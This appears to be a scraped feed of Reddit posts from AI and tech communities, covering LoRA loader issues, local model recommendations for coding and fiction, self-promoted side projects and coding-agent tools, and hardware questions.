I've been experimenting with Z-Image Selective Loader V2 node from ComfyUI-Realtime-Lora pack and I've been facing a weird 'issue' with my character loras. I'll try my best to try to simplify it as it's kinda complicated to explain lol.

The main parts of the lora that contains the character attributes only gets triggered when the 'other_weights' option is enabled. When it's disabled, lora is not applied at all, even when all the diffusion layers are enabled in Selective Loader node.

When I switch off 'other_weights' option and have everything else enabled, nothing applies to the layers (as if the lora is off). when I have 'other_weights' enabled and it's set on 0, the lora only applies a weird distill effect (burnt out colors).

And the strength of the lora effect (in this case character attributes) is heavily affected by the 'other_weights' value. when it's on 1, the generation process gets affected by a ton and weirdly enough, it also gets affected by the diffusion blocks/layers selected in Selective Loader node at the same time. so when I enable middle or first layers/blocks, the lora has more effect on the foundation of the image. And to make it even more complicated, when all the diffusion layers are off and only 'other_weights' is on with a high strength like 1.0, 'other_weights' affects the generated image alot as if the diffusion layers only amplify the effect or clean up the image better when they're enabled.

'other_weights' kinda contains the trigger for the lora. when 'other_weights' is disabled, the "info" output of the node says the lora is disabled and not applied at all, as if 'other_weights' is the section that triggers the lora.

I don't really know if it's because the Selective Loader can't properly detect the layers (maybe because of an unmatched prefix) or it's because of the training process (the lora is trained on wrong parts). But one thing I'm sure of, is that I don't face this issue with loras trained AI-Toolkit and the lora gets applied even when other_weights is disabled (even tho those loras are worse in quality).

I've trained only one of my character loras 13 times with different settings and configs. I started with u/malcolmrey config and I deleted and changed a lot of sections of it and even tried OneTrainer's default config. But nothing fixed it, even when I was training the lora on all layers.

Would be great if any of you can help with this regard and share his insight on this and share what might be causing this.

r/ClaudeCode quintenkamphuis

Ahhh yes. Good old over-engineering lol

r/LocalLLM Visual-Gain-2487

Possibly strange use case.

I'm fairly new to LocalLLMs but have enjoyed using them so far. One use case that I've been tinkering with that I didn't expect would be as fun is using it as sort of a DND DM or 'choose your own adventure' book. Writing a prompt, creating a world, and then playing it out.

My issue is that I quickly run out of context space. (Predictable limitation).

What are some ways to maximize my use case?

Is there a model that might be best for this?

What do I do when I run out of context?

5070 TI and 32 GB RAM

r/ChatGPT PT_ANDRE_PT

Improving OpenAI Codex with Repo-Specific Context

We're the team behind Codeset. A few weeks ago we published results showing that giving Claude Code structured context from your repo's git history improved task resolution by 7–10pp. We just ran the same eval on OpenAI Codex (GPT-5.4).

The numbers:

  • codeset-gym-python (150 tasks, same subset as the Claude eval): 60.7% → 66% (+5.3pp)

  • SWE-Bench Pro (400 randomly sampled tasks): 56.5% → 58.5% (+2pp)

Consistent improvement across both benchmarks, and consistent with what we saw on Claude. The SWE-Bench delta is smaller than on codeset-gym. The codeset-gym benchmark is ours, so the full task list and verifiers are public if you want to verify the methodology.

What Codeset does: it runs a pipeline over your git history and generates files that live directly in your repo — past bugs per file with root causes, known pitfalls, co-change relationships, test checklists. The agent reads them as part of its normal context window. No RAG, no vector DB at query time, no runtime infrastructure. Just static files your agent picks up like any other file in the repo.

Full eval artifacts are at https://github.com/codeset-ai/codeset-release-evals.

$5 per repo, one-time. Use code CODESETLAUNCH for a free trial. Happy to answer questions about the methodology or how the pipeline works.

Read more at https://codeset.ai/blog/improving-openai-codex-with-codeset

r/ClaudeCode goddamnit_1

I wanted a coding agent that's actually mine, so I distilled Claude Code down to 13 files

I’ve used all the popular coding agents in the market, Claude Code, Codex, Gemini CLI (yes, even this), Cursor and they are all great but they don’t feel mine. Once the Claude Code codebase leaked, i figured it was the perfect time to build a coding agent for myself from scratch. I set out to distill Claude Code first by stripping its essential parts and i called it nano claude code.

How it works

The core loop is simple: load skills and rules → append user message → call Anthropic with tools → execute tool calls → loop until the model stops. The whole thing is 15 files: a CLI entrypoint, an agent loop, tools, MCP client, file-backed instructions (NANO.md), skills, transcripts, API wrapper, and a readline UI.

One nice detail borrowed from Claude Code: file-changing tools return diffs via git diff --no-index, so the model gets structured change feedback instead of just "write succeeded."

What i kept from Claude Code

The harness shape (model + tool loop), the CLAUDE.md idea (shrunk to just workspace-local NANO.md), skills as the extensibility seam, MCP as first-class capability expansion, approval gates for risky actions, and local transcripts as append-only JSONL.

What i dropped

The massive command surface, React/Ink UI, concurrent tool orchestration, the hardened permission engine, and all the productization layers — memory systems, analytics, billing, feature flags, telemetry, IDE integration, voice, desktop surfaces. All valuable product features, but they explode surface area for a solo fork.

The design principle

Keep the parts that make Claude Code feel powerful. Remove the parts that make the codebase hard to hold in your head.

repo: https://github.com/Prat011/nano-claude-code

r/LocalLLaMA Dry_Sheepherder5907

Best model for 4090 as AI Coding Agent

Good day. I am looking for best local model for coding agent. I might've missed something or some model which is not that widely used so I cam here for the help.

Currently I have following models I found useful in agentic coding via Google's turbo quant applied on llama.cpp:

  • GLM 4.7 Flash Q4_K_M -> 30B
  • 30B Nemotron 3 Q4_K_M -> 30B
  • Qwen3 Coder Next Q4_K_M -> 80B

I really was trying to get Qwen3 Coder Next to get a decent t/s for input and output as I thought it would be a killer but to my surprise...it sometimes makes so silly mistakes that I have to do lots of babysitting for agentic flow.

GLM 4.7 and Nemotron are the ones I really can't decide between, both have decent t/s for agentic coding and I use both to maxed context window.

The thing is that I feel there might be some model that just missed from my sight.

Any suggestions?

My Rig:
RTX 4090, 64GB 5600 MT/S ram

Thank you in advance

r/SideProject Arpitech

Got bored so made this Domino Effect, lmk how it is

r/ClaudeAI BothAd2391

I built a skill building app with Claude, currently in MVP. Second idea already in ideation.

Started 2 months back on an idea of how people can use an app as an alternative for doomscrolling. Started with basic habits and content catalogue it created. Immediately fell in love with the features of document creation, Projects and project knowledge. It immediately became my brainstorming partner and more like a PM. I kept asking it to redefine the requirements as a PM and as a psychologist.

Claude has been my thinking/spec partner more than a one-shot code generator.

The idea of the first app: most apps in this space try to block scrolling, but the harder problem is that people usually open social apps because they want an easy dopamine hit, distraction, or a break.

So instead of only saying “don’t scroll,” I wanted to build something that gives you a better default action in that exact moment.

Right now Unscroll has short daily sessions across things like meditation, reading, and movement, plus streaks and lightweight progress tracking.

My workflow was:

- Claude for PRD, ideation, feature specs, and UX/product tradeoffs

- Cursor for implementation

- Claude Code for reviewing the codebase before push, especially for vulnerabilities, edge cases, and performance concerns

Second one is already in the ideation phase. It's to do with the recruitment industry. Hopefully will update about this idea in the next 6-8 weeks.

would really appreciate In case anyone is open to give feedback on the first one.

r/StableDiffusion Izolet

Wan 2.2 based model with weird saturation hue changes on Anime Video generation

I've been using the low version of this WAN 2.2 checkpoint merge > https://civitai.com/models/1981116/dasiwa-wan-22-i2v-14b-or-lightspeed-or-safetensors

To generate this video, but it inmediately starts to shift colors to this desaturated greenish hue after a few frames. This seems to happen either if the video is too long or to big, so far i want to know what is causing it so i can do something about it.

Currently running a new 5070ti with 32gb ddr4 RAM on comfyui and im using their recommendend clip / vae. i have similar problems with other low versions of this model like 8,9,10. i've tried their recommended settings for sampler, and tried to individually modify the sampler values to check if it makes any difference to no success.

I've done some research and some people report similar problems and blame the native VAE, or VAE tiling, but i cant know if their issue is the same as not all of them post a video of the error. I've Tested other models like Anisora 3.2 without issues but if possible i would like to rescue this model as i like the creativity in movement it creates

Anyone has any insight on what could be causing this issue?
Or has suggestions for Anime related video models with goon capacity?

r/whatisit Informal_Plankton822

What could be making this sound?

It’s either coming from the crawl space or inside the wall.

r/SideProject sms021

My AI Was Forgetting Everything! I Think I Fixed It :)

Something I've see constantly is people trying to solve the "my AI forgets everything" problem by making their instruction file bigger. 500 lines, 1,000 lines, 2,000 line .md file.

After a lot of trial and error, I've settled on a tiered approach to giving AI coding tools persistent memory. Curious what others are doing.

The problem I kept hitting: one big instruction file works until it doesn't. Past ~300 lines, the AI starts ignoring instructions in the middle. Past ~1,000 lines, you're burning context window for diminishing returns.

My current setup splits knowledge into 4 tiers:

-Global rules (~200 lines, always loaded) — preferences, routing table pointing to everything else

- Behavioral corrections (~50 lines, always loaded) — things the AI keeps getting wrong, logged as I encounter them

- Per-project context (loaded on entry) — business rules, schemas, decision logs. One file per project.

- Reference database (queried on demand) — full schemas, API docs, terminology in SQLite with full-text search

Plus a session log so the AI can recall past conversations per project.

The routing table is the key — Tier 1 doesn't hold the knowledge, it tells the AI where to find it. Small files always loaded, big knowledge only when needed.

There's a github repo https://github.com/sms021/SuperContext if you're interested in seeing if it will work for you.

What are you all doing for persistent context? Anyone else moved beyond the single-file approach?

r/ClaudeAI yoouvee

Is it possible to make Claude use Google Sheets to create financial model? And would this eat a lot of tokens? how accurate and detailed (with formulas integrated and dashboard) would it be?

Claude X Google Sheets, possibilities and limitations?

r/LocalLLaMA CrimsonShikabane

We aren’t even close to AGI

Supposedly we’ve reached AGI according to Jensen Huang and Marc Andreessen.

What a load of shit. I tried to get Claude code with Opus 4.6 max plan to play Elden Ring. Couldn’t even get past the first room. It made it past the character creator, but couldn’t leave the original chapel.

If it can’t play a game that millions have beat, if it can’t even get past the first room, how are we even close to Artificial GENERAL Intelligence?

I understand that this isn’t in its training data but that’s the entire point. Artificial general intelligence is supposed to be able to reason and think outside of its training data.

r/SideProject StatusIndividual4007

Finally finished my first app. Anyone want to help me test it?

Hey guys,

I just finished the MVP for my first mobile app. I originally went with a "read later" app because it felt simple and like a perfect fit for AI. I poured a ton of effort into figuring out how to help people actually distill knowledge in a way that feels intuitive, rather than just bookmarking links they'll never open again.

But tbh, after months of development, I’ve been feeling pretty discouraged. I realized the "read later" space is getting tougher—tools like NotebookLM are dominating, and website paywalls/restrictions are making everything a lot harder to build. I definitely lost some of my motivation along the way.

That said, I’m determined to see this through. I really want to experience the full process of launching something from start to finish, even if the market is shifting.

The app basically does two things:

  1. A Knowledge Web: It builds a visual map that grows as you take notes.
  2. Integrated AI: It’s built right into the reading flow to help you summarize and connect ideas.

I'm looking for 20 people who wouldn’t mind spending a bit of their time to test it out before I hit publish. If you're interested, just drop a comment below and I'll DM you for the details! I’d really appreciate any honest feedback or advice you guys have!

https://reddit.com/link/1se1bty/video/gafcowmb4ltg1/player

r/SideProject Responsible_Let_7806

Expense Diary: Expense Tracker

Hello guys! I just want to share something I’ve been working on recently.

I built this app because I got tired of overcomplicated expense trackers.

Too many features. Too much clutter.

When all I really needed was something simple that works.

So I created my own.

Expense Diary: Expense Tracker is now live on iOS and Android

It’s not trying to be everything.

Just the essentials:

• Clean and simple expense tracking

• Quick daily logging widget

• Lightweight and fast

That’s it.

No distractions. No unnecessary features.

If you’re someone who just wants to track expenses without the hassle, you might like this.

I’m just starting out, so I’d really appreciate your support.

Try it, share it, or even just drop your feedback.

Every small support helps

App Store
Play Store

r/mildlyinteresting plain-extraordinaire

Peach juice.. made with 100% pear juice.

r/meme LVA_MoP

We are just chill like that

r/mildlyinteresting blindralfie

Nopal farted here

r/LocalLLaMA AnOnlineHandle

After a week of trying many models for fiction writing, Gemma 4 26B A4B IT (Heretic) is the first one which feels actually capable.

In the very early days I was able to finetune a gen 1 llama base model on my own writing, but I wanted to avoid setting that all up again and was hoping that I could instruct a more modern model into writing what I want.

However every model which could fit on my GPU which I tried was a disappointment, even though they were widely praised as the best. Short contexts, frequent incoherency, not grasping the prompt, not grasping the subtleties of example text snippets, etc.

I was about to give up, but decided whatever I'll try an 'unlocked' version of the new Gemma models even though I expected that it would be bad due to the original training dataset being overly focused on math and 'safe' corporate content. And holy hell, I finally found a model which just works, and works incredibly well. There's a chance it might have included some of my own writing in some capacity which is out there across the web going back a few decades, since it locks right onto my style, themes, settings, etc. However when I query it for any specifics it doesn't seem to know them, so I don't think that's the case.

I suspect that I'll be renting some cloud processing for the first time ever to finetune this soon and make it even better. But even out of the box it's extremely capable. If anybody is looking for a strong local writing model, Gemma 4 is amazing. I used the following recommended creative writing settings, where I could find equivalents in LM Studio.

https://huggingface.co/nohurry/gemma-4-26B-A4B-it-heretic-GUFF

r/SideProject BallinwithPaint

[Easter Special] I’m building 4 MVPs (Web or Mobile)🐣

Hey everyone,

I’m Ray, a senior software engineer and the founder of TechInvolved. I usually spend my time architecting agentic AI systems and high-scale SaaS engines, but for Easter, I wanted to do something a little different.

I’m opening up 4 spots to build a functional, production-ready MVP for $250.

Why am I doing this?

I recently launched my agency, and while I have plenty of enterprise experience, I want to build a few more "startup-speed" case studies for our portfolio. Instead of building random side projects myself, I figured I’d help 4 of you get your ideas off the ground.

What you get for $250:

  • Full-Stack Build: A real web app or mobile app. No "no-code" limitations here.
  • Authentication & Database: Secure login and data storage.
  • AI Integration (if needed): I specialize in agentic AI, so if your idea needs LLM features, I’ve got you.
  • Clean Code: You own the repo. It’s built to scale, not just to show off.

The Catch?

There isn't one, other than the fact that I only have time for 4 projects at this rate. I’m looking for clear, concise ideas that can be built into a solid V1 in a week.

To apply: Shoot me a DM with:

  1. A 2-3 sentence summary of your idea.
  2. Your target audience.
  3. Your "must-have" feature.

Let’s build something cool. 🚀

*P.S. You can check out some of my work at techinvolved.dev

r/ChatGPT OkRisk3092

Has anyone tried Meow for agent bank accounts?

Saw someone mention this on twitter and it sounds almost too good to be true. Apparently you can open a business bank account and manage it entirely through AI agents like ChatGPT. The whole thing from onboarding to bill pay to invoicing is supposed to work through a conversational interface without ever touching a website.

Im running a medium sized ecommerce business and I spend way too much time on the financial side of things every week and if I could hand that off to an agent that would be really good for me.

r/LocalLLaMA Ice-Flaky

Gemma4 (e4b) hallucinating when reading .py files

I simply asked it read the directory (on a new conversation, no history) and describe what it is to me.

Once it reached a few python files, it started to getready to create files e modify stuff, as the .py files were meant to do.

So far, I have a few yml instructions for it, running the architect and installed the Universal Tags.

How do you keep Gemma4 from doing anything except the core prompt?

r/ollama No-Title-184

What if the real breakthrough for local LLMs isn’t cheaper hardware, but smarter small models?

I’ve been thinking that the real question for local LLMs may no longer be: “When will GPUs and RAM get cheaper?”

For a while, the race felt mostly centered around brute force: more parameters, bigger models, more scale, more hardware. But lately it seems like the direction is slowly shifting. Instead of just pushing toward massive trillion-parameter systems, more of the progress now seems to come from efficiency: better architectures, better training, lower-bit inference, smarter quantization, and getting more actual quality out of smaller models.

That’s why I’m starting to think the more important question is not when hardware becomes dramatically cheaper, or when the next Mac Studio / GPU generation arrives with even more memory, but when the models themselves become good enough that the sweet spot is already something like an M4 with 24 GB RAM.

In other words: when do we hit the point where “good enough local intelligence on modest hardware” becomes the real standard?

If that happens, then the future of local AI may be less about chasing the biggest possible machine and more about using the right efficient model for the right task. And maybe also less about one giant generalist model, and more about smaller, smarter, more specialized local models for specific use cases.

That’s also why models and directions like Gemma 4, Gemma Function, or Microsoft’s ultra-efficient low-bit / 1-bit style experiments seem so interesting to me. They feel closer to the actual long-term local AI sweet spot than the old mindset of just scaling forever.

Am I overreading this, or have you also noticed that the race seems to be shifting from “more parameters at all costs” toward “more quality per parameter”?

r/homeassistant FFHPunk

Has anyone figured out getting "Landbook" into HA? (Omnibreeze DC2313R)

I really like the Omnibreeze tower fan from Costco. i have pretty much got 1 a year as I find more spots that could use a fan. Just made a Costco run and picked a new one up and to my surprise it uses a new app called LandBook, not SmartLife like the others I've had the years before. I saw a post about moding the older versions for offline use but can't find any info for LandBook. it integrates with Google Home pretty well so not sure why I can't get it into HA. I'm not super technical and just started using HA about 3 months ago so if I missed something stupid please let me know. thanks

r/AI_Agents chicken_5000s

Cost-effective AI (Lumin)

Just finished Lumin

It’s a local AI cost-saving proxy for agent setups. It compresses, caches, and routes requests.

Free benchmark average so far: ~11%

Best case so far on repeated-context loops: 57%

Also verified an OpenClaw -> Lumin -> OpenAI path locally.

Looking for feedback and github stars if good.

r/AI_Agents Problemsolver_11

How does testing change for agentic AI systems vs traditional SDLC?

Hey everyone,

I’m trying to understand how testing evolves when moving from traditional software systems to agentic AI systems.

In standard SDLC, testing is deterministic (unit, integration, regression). But with agents:

  • Outputs are non-deterministic
  • Behavior depends on context, tools, and memory
  • Multi-step pipelines make debugging tricky

So curious:

  • How do you define correctness?
  • Do unit/integration tests still work, or are eval frameworks replacing them?
  • How do you handle regression testing when outputs can vary?
  • Is runtime monitoring/guardrails becoming more important than pre-release testing?

Would love to hear how people are handling this in real systems.

Thanks!

r/LocalLLaMA Scorpio_07

Waiting for M5 Pro Mac Mini — anyone actually running AI workloads on Apple Silicon? Not just LLMs

So we're a small team building on-prem AI stuff — agentic workflows, local LLM serving, RAG, audio models (ASR, TTS, stem separation, forced aligners). Proprietary data so everything has to stay local, no cloud.

Right now we're sharing an RTX 5070 Ti 16GB over LAN and it's already hitting its limits. VRAM is the bottleneck. So unified memory is the obvious next step and I'm looking at the M5 Pro Mac Mini 48GB when it drops.

I already know the CPU single/multi-core gains and GPU scores from benchmarks. That's not what I'm after. What I actually want to know is — how does it perform for real AI workloads? Specifically:

- MLX inference speed on small models (like Qwen 3.5 or Gemma 4) — especially for agentic stuff where you're doing a lot of short rapid calls, not long generation

- PyTorch with MPS — is it actually usable or still painful? Most of our stack is PyTorch and we don't know Metal/MLX well at all

- Non-LLM models — audio models, ASR, TTS, aligners, Image Gen , Up scaling Models. Does Metal acceleration actually kick in or do these mostly fall back to CPU?

- Prompt processing throughput specifically — not just tokens/sec on long outputs

We are kinda new to local LLM field so may need to cater to concurrent user haven't tried this with rtx 5070ti , mainly tested llama.cpp with LM studio .

Also curious if anyone's using Apple Silicon for broader org automation — accounts, CRM/CMS automation, document retrieval, internal RAG stuff. I want to explore what's actually possible beyond just LLM serving. We're a small org trying to figure out where AI can save real time across different departments.

Is the M5 Pro 48GB worth waiting for over buying M4 Pro 48GB now? Or is the jump not meaningful enough for GPU/ML workloads even if the CPU scores look good?

Following AZisk on YouTube — anyone know other people doing proper hardware evaluations for AI specifically, not just general Mac benchmarks?

Appreciate anyone sharing actual experience, and thoughts on this.

Benchmarkswould be great.

r/whatisit Sage2194

What is this in my cupboard?

My wife noticed in a cupboard these strange deposits. I assume it’s salt related, but can’t figure out how it could have crystallised on the side of the pink/ purple cardboard box. There haven’t been any salt or water spills in there either. What is it?!

r/StableDiffusion namitynamenamey

Relative size comparisons based on an object?

Is there any local model that can follow a prompt with relative sizes? I tried making a silly test with zimage, chroma, anima and SDXL, and none of them was capable of following this prompt:

"There are two hamburgers in a table. The first hamburger is the size of a watermelon. The second hamburger is twice the size of the first one.

The first hamburger is to the left of the second hamburger."

They all made the hamburger out of watermelon instead. This is interesting to me, as it is a minimal example of the limitations of current models, being something even a 5 years old would be able to draw.

Image made by chroma. Notice the similar size of the \"hamburgers\"

Image by zimage base. Interesting idea for a dish, but also a failure to follow the prompt.

The curious thing is that relative size comparisons work... with cubes on a table. So anyways I though it was an interesting thing to discuss.

r/singularity enilea

Gemini ad from December 2023 showcasing a capability that ended up not being real. When will we get multimodal LLMs that can actually process video in real time as accurately?

r/me_irl yeunofficial_25

Me_irl

r/SideProject ankush2324235

Side project: I just dodged ngrok's paid plan SSH on HTTPS

I just dodged ngrok paid plan by building my own tool that lets you run SSH on top of HTTPS.

So here’s the idea: ngrok gives you a public HTTPS URL that usually forwards traffic to your localhost—basically a free way to expose your local project to the internet. ngrok

also used to provide a TCP URL, which I relied on to remotely access my local machine (like SSH access). But they moved that feature to a paid plan, leaving only HTTPS free. So

I built my own workaround: a tool that tunnels SSH over HTTPS, letting me remotely access my machine using just the free HTTPS endpoint.

you can check out it here: https://github.com/ankushT369/GhostSSH

r/homeassistant Such_Ad_3096

Kasa KC400 Camera

Anyone sort out a way to add a live view to HAOS using the Kasa KC400 cameras? Claude and google searches have not yielded a result that works.

r/singularity thenewrepublic

Bernie Sanders’s New, Necessary, Bold Act: Taking on the AI Oligarchs

“The question that we have to ask is, “How do we use AI to improve life for all people?’” he said. “And just blindly following the lead of Mr. Musk and Mr. Bezos is not the way to do it. We need to have that kind of discussion. There’s a new technology, a new world that’s coming. Let’s make sure it benefits all of us, and not just a handful of billionaires.”

r/SideProject LeadershipOld1857

I grew up in my family's car dealership. Last month I built a daily car auction guessing game with AI tools. 40 strangers are already playing it.

Cars have been my whole life. Grew up in my dad's dealership, learned to read the market before I could legally drive. Eventually went out on my own, I now run a used car business.

A few months ago I kept browsing exotic car auctions online and realized something embarrassing: I genuinely didn't know if I'd nail the price on half of them. I've spent my entire career in the car business and a clean Lamborghini with an unknown history was stumping me.

So I built a game to find out.

It's called BERNIE (named after Bernie Ecclestone). Every day, 10 real exotic cars from real auctions. You guess the final sale price. Scored by how close you get.

I'm not a developer. I built the whole thing using Claude code, scraper, backend, frontend, everything.

Shared it in a couple of Reddit comments, not expecting much. 40 people I've never met played it this week.

That felt like something worth sharing here.

Happy to talk about the build, the car market, or how badly I personally score on my own game. → https://bernie-web.vercel.app/

What was the last thing you built just because you wanted to use it yourself?

r/mildlyinteresting LordGAD

My prescription has a refill of more than zero but less than one.

r/n8n Quiet-Programmer-131

error en n8n

"errorMessage": "Text to classify for item 0 is not defined",

r/SideProject SaiVaibhav06

looking at the roster for an upcoming ai hackathon and it gave me an existential crisis about my stack

been banging my head against the wall trying to fix some nasty auth routing bug in my mvp for like two weeks. to procrastinate i went down a rabbit hole scrolling through the profiles for this 48h ai hackathon happening in shanghai next weekend, which made me realize how totally one dimensional my 'just write clean code' mindset actually is.

The strongest profiles don't look like the old stereotype of backend devs grinding in the dark. They are weirdly hybrid. For example, I went down a rabbit hole on one profile, a girl who apparently came out of some hardcore NLP lab at Tsinghua/PKU. But instead of just publishing papers, she literally delayed her grad program to build hardware startups.

Here is the part that gave me an existential crisis: she isn't just writing the LLM fine-tuning logic. I checked her links, and she’s out here designing computational art for Nature journal covers. So you have someone wiring up physical robotic arms and integrating local models, but executing it with the aesthetic taste of a high-end design studio. She isn't just making the infra work; she's making raw, complex AI hardware actually legible and beautiful to normal people.

that mix feels super important rn. im starting to think the real edge in solo building isnt coming from raw technical ability anymore. its definately coming from combinations that used to be rare in one person. tech instinct plus product taste.

Their feedback loop is completely different too. they dont stealth build in a vacuum for 6 months. they just drop raw working hardware prototype videos directly onto consumer apps like rednote, get absolutely roasted by regular non-tech users in the comments on the usability, and iterate the physical or software design the exact same day. high speed, zero embarrassment, high taste.

idk just something ive been noticing. with ai writing half our boilerplate anyway it feels like the bar for shipping a side project is shifting from 'can you code it' to 'do you have the taste to make it actually usable'.

Mostly it just gave me massive imposter syndrome lol. going back to crying over my docker config now.

r/ollama CharlExMachina

Never ask Gemma 4 what are the lyrics of "Still Alive"

Just installed Gemma 4 via Ollama, I asked it the lyrics of "Still Alive", it proceeded to confuse itself to oblivion

r/SideProject kova98k

I built a free tool that helps you do market research on Reddit

I built feedgrep.com

It lets you describe what you're looking for on Reddit and emails you whenever it shows up.

Recently I've added the ability to do a historical search to test the keywords.

It's free and open source.

r/artificial Mstep85

Last Call: Perplexity, Replit, & GitHub— The AI Student Discounts You're Cheerfully Paying the Tourist Price For

If you got a student edu email, these official promos will expire soon.

r/whatisit jaggy2002

Help me ID these hairy balls I found under my tree (not creepy crawly)

I was pushing back the leaves around my avocado tree when I found these little white hairy orbs. At first I thought it was the avocado sending up roots, but I shifted one with a leaf, and it moved a little too easily to be a root. I checked other spots closer and farther from the tree to see if there were more orbs, but found none.

I checked Inaturalist but it didn’t come up with any convincing matches. Closest ID was a fishbone fern, which I have nearby, but I’ve never seen their bulbs look like this before. Any ideas reddit? Or a recommendation on a better sub to ask?

(I am not touching them)

r/homeassistant Zealousideal-Try7669

Home Assistant integration for Bpt CAME Domotic (Home Sapiens / ETI-Domo)

Hi all,

I’ve developed a indipendent custom integration for Home Assistant to interface with Bpt home automation / CAME Domotic 3.0 (ETI-Domo systems) via the Home Sapiens web interface.

The project is stable and currently supports:

  • Activations
  • Analogic inputs
  • Climate control
  • Digital inputs
  • Energy meters
  • Fan coils
  • Intrusion alarm panel
  • Lights
  • Openings
  • Scenes
  • TVCC

It works by interacting with the same web interface used by the system, allowing full monitoring and control directly from Home Assistant.

This is an independent project and still evolving. I’d really appreciate feedback or testing from anyone using this system.

GitHub: https://github.com/odoricof/Home-Sapiens-Assistant

r/whatisit ShorelineWA_InfoHunt

Black sludge on my concrete step under my deck

I'm both baffled and disgusted. What could this be?

Best guess is either a giant poop from a wild animal or a disintegrating mushroom that grew up under the green cloth (which is al old fabric/green faux lawn thingy).

There is also a bunch of worms/maggots in it.

This is in a suburb of Seattle.

Any ideas?

r/comfyui Disastrous-Ad670

Best workflow/stack for consistent anime-style AI comics in ComfyUI?

I’m trying to create an AI-generated comic with a semi-anime style, but with a higher level of detail and consistency than typical outputs.

My main goal is character consistency across panels, so my current workflow looks like this:

  • First, I generated a set of reference faces
  • Then I trained a LoRA specifically on the character’s face
  • After that, I trained additional LoRAs for clothing and overall appearance
  • Finally, I reuse these LoRAs when generating new images for different scenes

I’ve also experimented with IPAdapter, but in my case it didn’t handle the anime style very well — though that might be due to the model or my setup.

What I’m trying to achieve:

  • Consistent characters across multiple images/panels
  • Flexible posing and composition
  • Stylized (anime-inspired), but still detailed visuals

My questions:

  1. Has anyone here successfully built a similar pipeline for AI comics?
  2. What tools/workflows are you using in ComfyUI for character consistency?
  3. Are there better alternatives to LoRA + IPAdapter for this use case (e.g. ControlNet, reference-only pipelines, fine-tuning methods, etc.)?
  4. Can you recommend a solid “stack” (models + nodes + techniques) for this kind of project?

Any tips, example workflows, or even node graphs would be greatly appreciated!

r/ClaudeAI Independent_Face210

I built 9 free Claude Code skills for medical research — from lit search to manuscript revision

I'm a radiology researcher and I've been using Claude Code daily for about a year now. Over time I built a set of skills that cover most of the research workflow — from searching PubMed to preparing manuscripts for submission. I open-sourced them last week and wanted to share.

What's included (9 skills):

  • search-lit — Searches PubMed, Semantic Scholar, and bioRxiv. Every citation is verified against the actual API before being included (no hallucinated references).
  • check-reporting — Audits your manuscript against reporting guidelines (STROBE, STARD, TRIPOD+AI, PRISMA, ARRIVE, and more). Gives you item-by-item PRESENT/PARTIAL/MISSING status.
  • analyze-stats — Generates reproducible Python/R code for diagnostic accuracy, inter-rater agreement, survival analysis, meta-analysis, and demographics tables.
  • make-figures — Publication-ready figures at 300 DPI: ROC curves, forest plots, flow diagrams (PRISMA/CONSORT/STARD), Bland-Altman plots, confusion matrices.
  • design-study — Reviews your study design for data leakage, cohort logic issues, and reporting guideline fit before you start writing.
  • write-paper — Full IMRAD manuscript pipeline (8 phases from outline to submission-ready draft).
  • present-paper — Analyzes a paper, finds supporting references, and drafts speaker scripts for journal clubs or grand rounds.
  • grant-builder — Structures grant proposals with significance, innovation, approach, and milestones.
  • publish-skill — Meta-skill that helps you package your own Claude Code skills for open-source distribution (PII audit, license check).

Key design decisions:

  1. Anti-hallucination citationssearch-lit never generates references from memory. Every DOI/PMID is verified via API.
  2. Real checklists bundled — STROBE, STARD, TRIPOD+AI, PRISMA, and ARRIVE checklists are included (open-license ones). For copyrighted guidelines like CONSORT, the skill uses its knowledge but tells you to download the official checklist.
  3. Skills call each othercheck-reporting can invoke make-figures to generate a missing flow diagram, or analyze-stats to fill in statistical gaps.

Install:

git clone https://github.com/aperivue/medical-research-skills.git cp -r medical-research-skills/skills/* ~/.claude/skills/

Restart Claude Code and you're good to go. Works with CLI, desktop app, and IDE extensions.

GitHub: https://github.com/aperivue/medical-research-skills

Happy to answer questions about the implementation or take feature requests. If you work in a different research domain, the same skill architecture could be adapted — publish-skill was built specifically for that.

r/LocalLLaMA manoman42

I open-sourced a tool that compiles raw documents into an AI-navigable wiki with persistent memory; runs 100% locally

After seeing Karpathy's tweet about using LLMs to build personal wikis from research documents, I realized I'd already been using something similar like this internally for our R&D.

So I cleaned it up and open-sourced it.

What it does: You drop a folder of raw documents (PDFs, papers, notes, code, 60+ formats) and the LLM compiles them into a structured markdown wiki with backlinked articles, concept pages, and a master index. It then compresses everything into a .aura archive optimized for RAG retrieval (~97% smaller than raw source data).

How it works:

pip install aura-research research init my-project # copy docs into raw/ research ingest raw/ research compile research query "your question" 

Key design decisions:

  • No embeddings, no vector databases. Uses SimHash + Bloom Filters instead. Zero RAM overhead.
  • Built-in 3-tier Memory OS (facts / episodic / scratch pad) so the LLM doesn't forget important context across sessions
  • The wiki is just .md files, browse in Obsidian, VS Code, or whatever you like
  • Works with any LLM provider (OpenAI, Anthropic, Gemini) or as an agent-native tool inside Claude Code/Gemini CLI where no API key is needed
  • Everything runs locally. No data leaves your machine.

The "no embeddings" choice: I deliberately avoided the standard RAG pipeline (chunk → embed → vector search). Instead, the LLM compiles the knowledge into a well-structured wiki with an index. When you query, it reads the index, finds the 2-3 relevant articles, and only loads those. The LLM is smart enough to navigate a good file structure, you don't need a separate embedding model if the knowledge is properly organized.

GitHub: https://github.com/Rtalabs-ai/aura-research PyPI: pip install aura-research

Would love feedback from this community, especially on the "structured wiki vs vector embeddings" tradeoff. Looking forward to your thoughts!

Also thinking about packaging this into a product, any insights would be appreciated!

r/LocalLLaMA chicken_5000s

Cost savings in AI (Lumin)

Just finished Lumin: https://github.com/ryancloto-dot/Lumin

It’s a local AI cost-saving proxy for agent setups. It compresses, caches, and routes requests.

Free benchmark average so far: ~11%

Best case so far on repeated-context loops: 57%

Looking for feedback from people who try it

r/meme UsuallyComplicit

But it was fully charged...

r/SideProject phone_radio_tv

ESPN like live sports studio in your pocket

When we watch live sports in TV/Netflix, the match is augmented with commentary, scoreboards, player stats, GFX & Ads in real-time.

Have created an app that allows individuals, scools and academies to livestream similar real-time augmentation from mobile.

How ?

  • Studio in your pocket - Mix music, QR, clips, overlays, Ads, banners, text and stunning VFX/GFX in real time - all from your mobile.
  • Multicam - Supports network of mobile cameras. Choose the best angle angle shot for layering.
  • Multicast - Stream enhanced show instantly to one or more channels in YouTube, Instagram, X (Twitter) and Facebook.
  • DJ Style - Manage scenes & PiP of livestream using swipe and touch.

Download CheerArena Studio from Playstore

r/whatisit 20on_pump3

Carbon monoxide detector? Not sure.

Attached to the wall in my Airbnb, about maybe 10’ up. There’s no visible lights or anything.

r/ClaudeAI lowcoordination

**I built an MCP server with Claude Code to automate my Minnesota land search — here's what AI-assisted development actually looks like**

